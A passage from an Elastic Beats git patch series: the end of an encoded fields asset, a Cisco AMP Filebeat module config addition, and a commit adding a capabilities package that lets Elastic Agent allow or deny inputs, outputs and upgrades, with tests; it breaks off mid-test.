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" } diff --git a/x-pack/filebeat/modules.d/cisco.yml.disabled b/x-pack/filebeat/modules.d/cisco.yml.disabled index fedb2c03d093..6a9336103367 100644 --- a/x-pack/filebeat/modules.d/cisco.yml.disabled +++ b/x-pack/filebeat/modules.d/cisco.yml.disabled @@ -123,3 +123,20 @@ #var.visibility_timeout: 300s # Maximum duration before AWS API request will be interrupted #var.api_timeout: 120s + + amp: + enabled: true + + # Set which input to use between httpjson (default) or file. + #var.input: httpjson + + # The API URL + #var.url: https://api.amp.cisco.com/v1/events + # The client ID used as a username for the API requests. + #var.client_id: + # The API key related to the client ID. + #var.api_key: + # How far to look back the first time the module is started. Expects an amount of hours. + #var.first_interval: 24h + # Overriding the default request timeout, optional. + #var.request_timeout: 60s From 282a7bcf34e8ef8b68de7dfb44e15c640a96aa2e Mon Sep 17 00:00:00 2001 From: Michal Pristas Date: Mon, 15 Feb 2021 14:43:29 +0100 Subject: [PATCH 38/63] [Ingest Management] Agent supports capabilities definition (#23848) [Ingest Management] Agent supports capabilities definition (#23848) --- x-pack/elastic-agent/CHANGELOG.asciidoc | 1 + .../pkg/agent/application/emitter.go | 19 +- .../pkg/agent/application/info/agent_id.go | 6 + .../agent/application/inspect_config_cmd.go | 22 +- .../agent/application/inspect_output_cmd.go | 8 + .../pkg/agent/application/local_mode.go | 10 +- .../pkg/agent/application/managed_mode.go | 10 +- .../agent/application/managed_mode_test.go | 2 +- .../application/noop_status_controller.go | 9 +- .../pkg/agent/application/upgrade/upgrade.go | 11 +- .../pkg/capabilities/capabilities.go | 97 +++++ .../pkg/capabilities/capabilities_test.go | 346 +++++++++++++++ x-pack/elastic-agent/pkg/capabilities/expr.go | 37 ++ .../pkg/capabilities/expr_test.go | 43 ++ .../elastic-agent/pkg/capabilities/input.go | 265 ++++++++++++ .../pkg/capabilities/input_test.go | 398 ++++++++++++++++++ .../elastic-agent/pkg/capabilities/output.go | 211 ++++++++++ .../pkg/capabilities/output_test.go | 373 ++++++++++++++++ x-pack/elastic-agent/pkg/capabilities/rule.go | 112 +++++ .../pkg/capabilities/rule_test.go | 122 ++++++ .../testdata/allow_metrics-capabilities.yml | 6 + .../testdata/allow_metrics-config.yml | 20 + .../testdata/allow_metrics-result.yml | 14 + .../testdata/deny_logs-capabilities.yml | 4 + .../testdata/deny_logs-config.yml | 20 + .../testdata/deny_logs-result.yml | 14 + .../testdata/filter_metrics-capabilities.yml | 4 + .../testdata/filter_metrics-config.yml | 20 + .../testdata/filter_metrics-result.yml | 20 + .../testdata/invalid-capabilities.yml | 6 + .../capabilities/testdata/invalid-config.yml | 18 + .../testdata/invalid_output-capabilities.yml | 4 + .../testdata/invalid_output-config.yml | 19 + .../capabilities/testdata/no_caps-config.yml | 20 + .../capabilities/testdata/no_caps-result.yml | 20 + .../elastic-agent/pkg/capabilities/upgrade.go | 191 +++++++++ .../pkg/capabilities/upgrade_test.go | 344 +++++++++++++++ .../elastic-agent/pkg/core/status/reporter.go | 11 +- 38 files changed, 2847 insertions(+), 10 deletions(-) create mode 100644 x-pack/elastic-agent/pkg/capabilities/capabilities.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/capabilities_test.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/expr.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/expr_test.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/input.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/input_test.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/output.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/output_test.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/rule.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/rule_test.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-capabilities.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-config.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/allow_metrics-result.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-capabilities.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-config.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/deny_logs-result.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-capabilities.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-config.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/filter_metrics-result.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/invalid-capabilities.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/invalid-config.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-capabilities.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/invalid_output-config.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-config.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/testdata/no_caps-result.yml create mode 100644 x-pack/elastic-agent/pkg/capabilities/upgrade.go create mode 100644 x-pack/elastic-agent/pkg/capabilities/upgrade_test.go diff --git a/x-pack/elastic-agent/CHANGELOG.asciidoc b/x-pack/elastic-agent/CHANGELOG.asciidoc index d94ad8aee0d8..58f827aca178 100644 --- a/x-pack/elastic-agent/CHANGELOG.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.asciidoc @@ -53,6 +53,7 @@ - Add --staging option to enroll command {pull}20026[20026] - Add `event.dataset` to all events {pull}20076[20076] - Send datastreams fields {pull}20416[20416] +- Agent supports capabilities definition {pull}23848[23848] [[release-notes-7.8.0]] === Elastic Agent version 7.8.0 diff --git a/x-pack/elastic-agent/pkg/agent/application/emitter.go b/x-pack/elastic-agent/pkg/agent/application/emitter.go index 5faa6814e777..0b575db52f76 100644 --- a/x-pack/elastic-agent/pkg/agent/application/emitter.go +++ b/x-pack/elastic-agent/pkg/agent/application/emitter.go @@ -14,6 +14,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -42,6 +43,7 @@ type emitterController struct { router programsDispatcher modifiers *configModifiers reloadables []reloadable + caps capabilities.Capability // state lock sync.RWMutex @@ -65,6 +67,20 @@ func (e *emitterController) Update(c *config.Config) error { if err != nil { return errors.New(err, "could not create the AST from the configuration", errors.TypeConfig) } + + if e.caps != nil { + var ok bool + updatedAst, err := e.caps.Apply(rawAst) + if err != nil { + return errors.New(err, "failed to apply capabilities") + } + + rawAst, ok = updatedAst.(*transpiler.AST) + if !ok { + return errors.New("failed to transform object returned from capabilities to AST", errors.TypeConfig) + } + } + for _, filter := range e.modifiers.Filters { if err := filter(e.logger, rawAst); err != nil { return errors.New(err, "failed to filter configuration", errors.TypeConfig) @@ -142,7 +158,7 @@ func (e *emitterController) update() error { return e.router.Dispatch(ast.HashStr(), programsToRun) } -func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, router programsDispatcher, modifiers *configModifiers, reloadables ...reloadable) (emitterFunc, error) { +func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, router programsDispatcher, modifiers *configModifiers, caps capabilities.Capability, reloadables ...reloadable) (emitterFunc, error) { log.Debugf("Supported programs: %s", strings.Join(program.KnownProgramNames(), ", ")) init, _ := transpiler.NewVars(map[string]interface{}{}) @@ -154,6 +170,7 @@ func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, modifiers: modifiers, reloadables: reloadables, vars: []*transpiler.Vars{init}, + caps: caps, } err := controller.Run(ctx, func(vars []*transpiler.Vars) { ctrl.Set(vars) diff --git a/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go b/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go index a6551b685803..f189c43d01e5 100644 --- a/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go +++ b/x-pack/elastic-agent/pkg/agent/application/info/agent_id.go @@ -20,6 +20,7 @@ import ( ) // defaultAgentConfigFile is a name of file used to store agent information +const defaultAgentCapabilitiesFile = "capabilities.yml" const defaultAgentConfigFile = "fleet.yml" const agentInfoKey = "agent" @@ -44,6 +45,11 @@ func AgentConfigFile() string { return filepath.Join(paths.Config(), defaultAgentConfigFile) } +// AgentCapabilitiesPath is a name of file used to store agent capabilities +func AgentCapabilitiesPath() string { + return filepath.Join(paths.Config(), defaultAgentCapabilitiesFile) +} + // AgentActionStoreFile is the file that contains the action that can be replayed after restart. func AgentActionStoreFile() string { return filepath.Join(paths.Home(), defaultAgentActionStoreFile) diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go index 15dccd83a88b..5655aad4d3e2 100644 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/application/inspect_config_cmd.go @@ -13,7 +13,9 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) @@ -118,7 +120,25 @@ func loadFleetConfig(cfg *config.Config) (map[string]interface{}, error) { } func printMapStringConfig(mapStr map[string]interface{}) error { - data, err := yaml.Marshal(mapStr) + l, err := newErrorLogger() + if err != nil { + return err + } + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), l, status.NewController(l)) + if err != nil { + return err + } + + newCfg, err := caps.Apply(mapStr) + if err != nil { + return errors.New(err, "failed to apply capabilities") + } + newMap, ok := newCfg.(map[string]interface{}) + if !ok { + return errors.New("config returned from capabilities has invalid type") + } + + data, err := yaml.Marshal(newMap) if err != nil { return errors.New(err, "could not marshal to YAML") } diff --git a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go b/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go index 49ec8d0b3eba..2ec9280dfa0d 100644 --- a/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go +++ b/x-pack/elastic-agent/pkg/agent/application/inspect_output_cmd.go @@ -17,10 +17,12 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/monitoring/noop" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" ) // InspectOutputCmd is an inspect subcommand that shows configurations of the agent. @@ -207,6 +209,11 @@ func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *c modifiers.Filters = append(modifiers.Filters, injectFleet(cfg, sysInfo.Info(), agentInfo)) } + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, status.NewController(log)) + if err != nil { + return nil, err + } + emit, err := emitter( ctx, log, @@ -214,6 +221,7 @@ func getProgramsFromConfig(log *logger.Logger, agentInfo *info.AgentInfo, cfg *c composableWaiter, router, modifiers, + caps, monitor, ) if err != nil { diff --git a/x-pack/elastic-agent/pkg/agent/application/local_mode.go b/x-pack/elastic-agent/pkg/agent/application/local_mode.go index 5123cd5f834f..e805c7423aad 100644 --- a/x-pack/elastic-agent/pkg/agent/application/local_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/local_mode.go @@ -14,6 +14,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -66,6 +67,11 @@ func newLocal( agentInfo *info.AgentInfo, ) (*Local, error) { statusController := &noopController{} + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusController) + if err != nil { + return nil, err + } + cfg, err := configuration.NewFromConfig(rawConfig) if err != nil { return nil, err @@ -120,6 +126,7 @@ func newLocal( Decorators: []decoratorFunc{injectMonitoring}, Filters: []filterFunc{filters.StreamChecker}, }, + caps, monitor, ) if err != nil { @@ -145,7 +152,8 @@ func newLocal( []context.CancelFunc{localApplication.cancelCtxFn}, reexec, newNoopAcker(), - reporter) + reporter, + caps) uc.SetUpgrader(upgrader) return localApplication, nil diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go index 9ad1f24a3d0d..c5c6d542d8f8 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode.go @@ -20,6 +20,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -66,6 +67,11 @@ func newManaged( agentInfo *info.AgentInfo, ) (*Managed, error) { statusController := status.NewController(log) + caps, err := capabilities.Load(info.AgentCapabilitiesPath(), log, statusController) + if err != nil { + return nil, err + } + path := info.AgentConfigFile() store := storage.NewDiskStore(path) @@ -173,6 +179,7 @@ func newManaged( Decorators: []decoratorFunc{injectMonitoring}, Filters: []filterFunc{filters.StreamChecker, injectFleet(config, sysInfo.Info(), agentInfo)}, }, + caps, monitor, ) if err != nil { @@ -205,7 +212,8 @@ func newManaged( []context.CancelFunc{managedApplication.cancelCtxFn}, reexec, acker, - combinedReporter) + combinedReporter, + caps) policyChanger := &handlerPolicyChange{ log: log, diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go index 4325c5ce7a63..890183e9033d 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go @@ -39,7 +39,7 @@ func TestManagedModeRouting(t *testing.T) { agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} composableCtrl, _ := composable.New(log, nil) - emit, err := emitter(ctx, log, agentInfo, composableCtrl, router, &configModifiers{Decorators: []decoratorFunc{injectMonitoring}}) + emit, err := emitter(ctx, log, agentInfo, composableCtrl, router, &configModifiers{Decorators: []decoratorFunc{injectMonitoring}}, nil) require.NoError(t, err) actionDispatcher, err := newActionDispatcher(ctx, log, &handlerDefault{log: log}) diff --git a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go b/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go index 61528e0b761e..1c55fda08e7b 100644 --- a/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go +++ b/x-pack/elastic-agent/pkg/agent/application/noop_status_controller.go @@ -11,9 +11,12 @@ import ( type noopController struct{} func (*noopController) Register(_ string) status.Reporter { return &noopReporter{} } -func (*noopController) Status() status.AgentStatus { return status.Healthy } -func (*noopController) UpdateStateID(_ string) {} -func (*noopController) StatusString() string { return "online" } +func (*noopController) RegisterWithPersistance(_ string, _ bool) status.Reporter { + return &noopReporter{} +} +func (*noopController) Status() status.AgentStatus { return status.Healthy } +func (*noopController) UpdateStateID(_ string) {} +func (*noopController) StatusString() string { return "online" } type noopReporter struct{} diff --git a/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go b/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go index 9b7a271a9d74..4e75d92fb1d3 100644 --- a/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go +++ b/x-pack/elastic-agent/pkg/agent/application/upgrade/upgrade.go @@ -18,6 +18,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/install" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/state" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" @@ -48,6 +49,7 @@ type Upgrader struct { acker acker reporter stateReporter upgradeable bool + caps capabilities.Capability } // Action is the upgrade action state. @@ -81,7 +83,7 @@ func IsUpgradeable() bool { } // NewUpgrader creates an upgrader which is capable of performing upgrade operation -func NewUpgrader(agentInfo *info.AgentInfo, settings *artifact.Config, log *logger.Logger, closers []context.CancelFunc, reexec reexecManager, a acker, r stateReporter) *Upgrader { +func NewUpgrader(agentInfo *info.AgentInfo, settings *artifact.Config, log *logger.Logger, closers []context.CancelFunc, reexec reexecManager, a acker, r stateReporter, caps capabilities.Capability) *Upgrader { return &Upgrader{ agentInfo: agentInfo, settings: settings, @@ -91,6 +93,7 @@ func NewUpgrader(agentInfo *info.AgentInfo, settings *artifact.Config, log *logg acker: a, reporter: r, upgradeable: IsUpgradeable(), + caps: caps, } } @@ -116,6 +119,12 @@ func (u *Upgrader) Upgrade(ctx context.Context, a Action, reexecNow bool) (err e "running under control of the systems supervisor") } + if u.caps != nil { + if _, err := u.caps.Apply(a); err == capabilities.ErrBlocked { + return nil + } + } + u.reportUpdating(a.Version()) sourceURI, err := u.sourceURI(a.Version(), a.SourceURI()) diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities.go b/x-pack/elastic-agent/pkg/capabilities/capabilities.go new file mode 100644 index 000000000000..498e09ac1012 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities.go @@ -0,0 +1,97 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "errors" + "os" + + "gopkg.in/yaml.v2" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +// Capability provides a way of applying predefined filter to object. +// It's up to capability to determine if capability is applicable on object. +type Capability interface { + // Apply applies capabilities on input and returns true if input should be completely blocked + // otherwise, false and updated input is returned + Apply(interface{}) (interface{}, error) +} + +var ( + // ErrBlocked is returned when capability is blocking. + ErrBlocked = errors.New("capability blocked") +) + +type capabilitiesManager struct { + caps []Capability + reporter status.Reporter +} + +type capabilityFactory func(*logger.Logger, *ruleDefinitions, status.Reporter) (Capability, error) + +// Load loads capabilities files and prepares manager. +func Load(capsFile string, log *logger.Logger, sc status.Controller) (Capability, error) { + handlers := []capabilityFactory{ + newInputsCapability, + newOutputsCapability, + newUpgradesCapability, + } + + cm := &capabilitiesManager{ + caps: make([]Capability, 0), + reporter: sc.RegisterWithPersistance("capabilities", true), + } + + // load capabilities from file + fd, err := os.Open(capsFile) + if err != nil && !os.IsNotExist(err) { + return cm, err + } + + if os.IsNotExist(err) { + log.Infof("capabilities file not found in %s", capsFile) + return cm, nil + } + defer fd.Close() + + definitions := &ruleDefinitions{Capabilities: make([]ruler, 0)} + dec := yaml.NewDecoder(fd) + if err := dec.Decode(&definitions); err != nil { + return cm, err + } + + // make list of handlers out of capabilities definition + for _, h := range handlers { + cap, err := h(log, definitions, cm.reporter) + if err != nil { + return nil, err + } + + if cap == nil { + continue + } + + cm.caps = append(cm.caps, cap) + } + + return cm, nil +} + +func (mgr *capabilitiesManager) Apply(in interface{}) (interface{}, error) { + var err error + // reset health on start, child caps will update to fail if needed + mgr.reporter.Update(status.Healthy) + for _, cap := range mgr.caps { + in, err = cap.Apply(in) + if err != nil { + return in, err + } + } + + return in, nil +} diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go new file mode 100644 index 000000000000..d59b7c629392 --- /dev/null +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go @@ -0,0 +1,346 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package capabilities + +import ( + "fmt" + "io" + "os" + "path/filepath" + "testing" + + "github.com/google/go-cmp/cmp" + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" +) + +func TestLoadCapabilities(t *testing.T) { + testCases := []string{ + "filter_metrics", + "allow_metrics", + "deny_logs", + "no_caps", + } + + l, _ := logger.New("test") + + for _, tc := range testCases { + t.Run(tc, func(t *testing.T) { + filename := filepath.Join("testdata", fmt.Sprintf("%s-capabilities.yml", tc)) + controller := status.NewController(l) + caps, err := Load(filename, l, controller) + assert.NoError(t, err) + assert.NotNil(t, caps) + + cfg, configCloser := getConfigWithCloser(t, filepath.Join("testdata", fmt.Sprintf("%s-config.yml", tc))) + defer configCloser.Close() + + mm, err := cfg.ToMapStr() + assert.NoError(t, err) + assert.NotNil(t, mm) + + out, err := caps.Apply(mm) + assert.NoError(t, err, "should not be failing") + assert.NotEqual(t, ErrBlocked, err, "should not be blocking") + + resultConfig, ok := out.(map[string]interface{}) + assert.True(t, ok) + + expectedConfig, resultCloser := getConfigWithCloser(t, filepath.Join("testdata", 